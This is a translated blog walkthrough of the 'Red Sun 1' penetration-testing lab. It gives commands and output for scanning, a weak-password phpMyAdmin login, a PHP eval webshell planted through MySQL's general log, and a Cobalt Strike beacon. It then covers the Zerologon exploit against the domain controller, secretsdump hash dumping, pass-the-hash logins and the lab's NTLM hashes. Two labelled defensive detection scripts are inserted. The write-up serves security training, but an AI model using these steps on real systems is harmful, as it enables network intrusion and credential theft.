Red Sun 1 (红日1)

Environment

Windows 11 attack machine: 192.168.44.142
Windows 7 (web server): 192.168.44.141, 192.168.52.143
Windows 2008 (DC): 192.168.52.138
Win2k3: 192.168.52.141

External information gathering

nmap scan

Scanning for live hosts

nmap -sn 192.168.44.0/24


└─# nmap -sn 192.168.44.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:06 EST
Nmap scan report for 192.168.44.1
Host is up (0.00023s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.44.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:E0:12:92 (VMware)
Nmap scan report for 192.168.44.141
Host is up (0.00035s latency).
MAC Address: 00:0C:29:59:B3:A5 (VMware)
Nmap scan report for 192.168.44.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:ED:12:ED (VMware)
Nmap scan report for 192.168.44.142
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 18.47 seconds

192.168.44.141 is the newly added host, so it is our target.

Port scanning

nmap --min-rate 10000 -p- 192.168.44.141
nmap -sT -sV -sC -O -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141 -Pn
nmap -sU --top-ports 100 192.168.44.141
nmap --script=vuln -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.44.141
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:13 EST
Nmap scan report for 192.168.44.141
Host is up (0.00092s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1057/tcp open startron
3306/tcp open mysql
MAC Address: 00:0C:29:59:B3:A5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -sC -O -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:16 EST
Nmap scan report for 192.168.44.141
Host is up (0.00046s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:59:B3:A5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008|7|Vista|8.1
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-11-03T11:17:18
|_ start_date: 2025-11-03T10:07:34
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:59:b3:a5 (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name: god.org
| Forest name: god.org
| FQDN: stu1.god.org
|_ System time: 2025-11-03T19:17:18+08:00
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141

Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:16 EST
Nmap scan report for 192.168.44.141
Host is up (0.00048s latency).

PORT STATE SERVICE
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.44.141:80/l.php?act=Function%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?act=Function%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| http://192.168.44.141:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://192.168.44.141/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.44.141
| References:
| http://php.net/manual/en/reserved.variables.server.php
|_ https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.44.141
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.44.141:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://192.168.44.141:80/l.php
| Form id:
|_ Form action: /l.php#bottom
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1057/tcp open startron
3306/tcp open mysql
MAC Address: 00:0C:29:59:B3:A5 (VMware)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

Nmap done: 1 IP address (1 host up) scanned in 133.90 seconds

The nmap script scans flag several vulnerabilities:

MS17-010 (EternalBlue)
SQL injection
XSS (cross-site scripting)

gobuster

Directory scan

gobuster dir -u http://192.168.44.141/ -w /usr/share/wordlists/dirb/big.txt -t 50 -f -q
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.44.141/ -w /usr/share/wordlists/dirb/big.txt -t 50 -f -q
/.htaccess/ (Status: 403) [Size: 219]
/.htpasswd/ (Status: 403) [Size: 219]
/aux/ (Status: 403) [Size: 213]
/com1/ (Status: 403) [Size: 214]
/com2/ (Status: 403) [Size: 214]
/com4/ (Status: 403) [Size: 214]
/com3/ (Status: 403) [Size: 214]
/con/ (Status: 403) [Size: 213]
/lpt2/ (Status: 403) [Size: 214]
/lpt1/ (Status: 403) [Size: 214]
/nul/ (Status: 403) [Size: 213]
/phpMyAdmin/ (Status: 200) [Size: 4378]
/phpmyadmin/ (Status: 200) [Size: 4378]
/prn/ (Status: 403) [Size: 213]
/secci�/ (Status: 403) [Size: 216]

/phpMyAdmin/ exists.

Try a weak password:

root:root

Login succeeds.

Finally, settle on the attack priority:

Port 80 -> /phpMyAdmin -> MS17-010 -> SQL injection

External network penetration

Getting a shell through the database

First, visit port 80.

It serves a PHP probe page.

The page discloses the absolute path:

C:/phpStudy/WWW

Next, visit http://192.168.44.141/phpMyAdmin

Check the general query log status:

show variables like '%general%'

Try changing it:

SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/w.php'

Test by running select "<?php phpinfo();?>" and then requesting:

http://192.168.44.141/w.php

Write the webshell:

SELECT "<?php phpinfo();@eval($_POST['cmd'])?>"

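Connect with AntSword (蚁剑).

Checking privileges from the command line shows an administrator account, and the host belongs to a domain.

There is a second network interface, which should be the domain network.

That concludes the external phase; next is the internal network.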
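A defender-side check for the general_log_file trick used above, added here as an example (not code from the original post): it scans SQL statements, for instance from an audit trail or a database proxy log, and flags any that repoint general_log_file at a script extension or at a path under the web root. The sample statements are constructed, and the WEB_ROOTS and SCRIPT_EXTS values are assumptions to adapt per host.

```python
import re
from pathlib import PureWindowsPath

# Assumption: directories served by the web server on the monitored host.
WEB_ROOTS = [PureWindowsPath("C:/phpStudy/WWW")]
# Assumption: extensions the web server hands to an interpreter.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}

# Matches: SET GLOBAL general_log_file = '...'  and  SET @@global.general_log_file = "..."
SET_LOGFILE = re.compile(
    r"""set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*(['"])(.+?)\1""",
    re.IGNORECASE,
)

def under_web_root(path):
    """Case-insensitive prefix match, the way Windows compares paths."""
    parts = [p.lower() for p in path.parts]
    return any(parts[:len(r.parts)] == [p.lower() for p in r.parts] for r in WEB_ROOTS)

def check_statement(sql):
    """Return the reasons a statement is suspicious (empty list if clean)."""
    m = SET_LOGFILE.search(sql)
    if not m:
        return []
    target = PureWindowsPath(m.group(2))
    reasons = []
    if target.suffix.lower() in SCRIPT_EXTS:
        reasons.append(f"log file has script extension {target.suffix.lower()}")
    if under_web_root(target):
        reasons.append("log file is inside a web root")
    return reasons

def scan(statements):
    """Return (statement, reasons) for every flagged statement."""
    return [(s, r) for s in statements if (r := check_statement(s))]

# Constructed sample statements
SAMPLE = [
    "show variables like '%general%'",
    "SET GLOBAL general_log='on'",
    "SET GLOBAL general_log_file='C:/phpStudy/www/w.php'",
    "SET GLOBAL general_log_file='D:/mysql/data/stu1.log'",
]

if __name__ == "__main__":
    for stmt, reasons in scan(SAMPLE):
        print(stmt, "->", "; ".join(reasons))
```

Setting a global variable needs the SUPER privilege (or SYSTEM_VARIABLES_ADMIN on MySQL 8.0), so an application account without it cannot make this change at all.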

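Internal network penetration

net view // list hosts in the current domain
net view /domain // list the domains
echo %logonserver% // logon server (the DC that handled the logon)
ipconfig /all | findstr "DNS" // check DNS; the DNS server is usually the DC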

The collected information:

Domain: god.org
STU1 (currently controlled host): 192.168.44.141, 192.168.52.143
owa (domain controller): 192.168.52.138
ROOT-TVI862UBEH (member): 192.168.52.141

Getting a Cobalt Strike (CS) beacon

Set up a listener, generate an executable, then upload and run it with AntSword.

Change the sleep interval:

sleep 0

The information obtained through CS matches what the command line returned.

Tunnel proxy

Start a SOCKS proxy on port 1080 in CS.

Kali configuration:

sudo vi /etc/proxychains4.conf
socks4 192.168.44.142 1080

CVE-2020-1472

Test for CVE-2020-1472:

proxychains python3 zerologon_tester.py OWA 192.168.52.138

The machine account password reset attack is possible.

Set the DC's password to empty:

proxychains python3 cve-2020-1472-exploit.py OWA 192.168.52.138

Success.

Dumping hashes

Use secretsdump.py from the impacket package to obtain the hashes:

proxychains python3 secretsdump.py god.org/OWA\$@192.168.52.138 -no-pass

Log in

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387 god/Administrator@192.168.52.138

The DC is now under control.

Export the SAM

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Extract hashes from the SAM (these are the local administrator's hashes):

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Restore the original hash

proxychains python3 reinstall_original_pw.py OWA 192.168.52.138 75f17da3f75b5cc6b3da3978631b2e44   

Verify:

proxychains python3 secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:75f17da3f75b5cc6b3da3978631b2e44 god.org/OWA\$@192.168.52.138

Success.
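What the CVE-2020-1472 steps above look like from the DC's Security log, as an added detection example (not code from the original post): it flags event 4742 where ANONYMOUS LOGON changes the DC machine account password, and escalates when event 4624 then shows that machine account logging on over the network from an address that is not the DC, which is how secretsdump.py authenticated as OWA$ through the proxy. It assumes events are already parsed into dicts keyed by the Windows event field names; DC_ACCOUNTS, the 30-minute window and the sample events are constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumption: each DC machine account mapped to the addresses it legitimately
# logs on from ("-" and loopback appear for local logons).
DC_ACCOUNTS = {"OWA$": {"192.168.52.138", "127.0.0.1", "::1", "-"}}
WINDOW = timedelta(minutes=30)  # assumption: correlation window

def ts(e):
    return datetime.fromisoformat(e["TimeCreated"])

def anonymous_reset(e):
    """4742: DC machine account password changed by ANONYMOUS LOGON."""
    return (e["EventID"] == 4742
            and e.get("TargetUserName") in DC_ACCOUNTS
            and e.get("SubjectUserName") == "ANONYMOUS LOGON"
            and e.get("PasswordLastSet", "-") != "-")

def foreign_dc_logon(e):
    """4624 type 3: DC machine account logging on from a non-DC address."""
    acct = e.get("TargetUserName")
    return (e["EventID"] == 4624 and e.get("LogonType") == 3
            and acct in DC_ACCOUNTS
            and e.get("IpAddress") not in DC_ACCOUNTS[acct])

def detect(events):
    """Return (severity, account, reason); reset then foreign logon is critical."""
    alerts, resets = [], {}
    for e in sorted(events, key=ts):
        if anonymous_reset(e):
            resets[e["TargetUserName"]] = ts(e)
            alerts.append(("high", e["TargetUserName"], "anonymous machine password reset"))
        elif foreign_dc_logon(e):
            acct = e["TargetUserName"]
            seen = resets.get(acct)
            sev = "critical" if seen and ts(e) - seen <= WINDOW else "medium"
            alerts.append((sev, acct, f"DC account logon from {e['IpAddress']}"))
    return alerts

# Constructed sample events (not taken from the lab)
SAMPLE = [
    {"EventID": 4624, "TimeCreated": "2025-11-03T19:00:02", "TargetUserName": "OWA$",
     "LogonType": 3, "IpAddress": "192.168.52.138"},
    {"EventID": 4742, "TimeCreated": "2025-11-03T21:14:40", "TargetUserName": "OWA$",
     "SubjectUserName": "ANONYMOUS LOGON", "PasswordLastSet": "11/3/2025 9:14:40 PM"},
    {"EventID": 4624, "TimeCreated": "2025-11-03T21:16:05", "TargetUserName": "OWA$",
     "LogonType": 3, "IpAddress": "192.168.52.143"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```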

Final hashes

Domain administrator hashes:

Administrator: 42e2656ec24331269f82160ff5962387

liukaifeng01: 42e2656ec24331269f82160ff5962387 (same hash as Administrator)

Other users:

god.org\ligang: 1e3d22f88dfd250c9312d21686c60f41

krbtgt: 58e91a5ac358d86513ab224312314061

Red Sun 1 (红日1)
http://xiaowu5.cn/2025/12/11/红日1/
Author: 5
Published: December 11, 2025
License: BY XIAOWU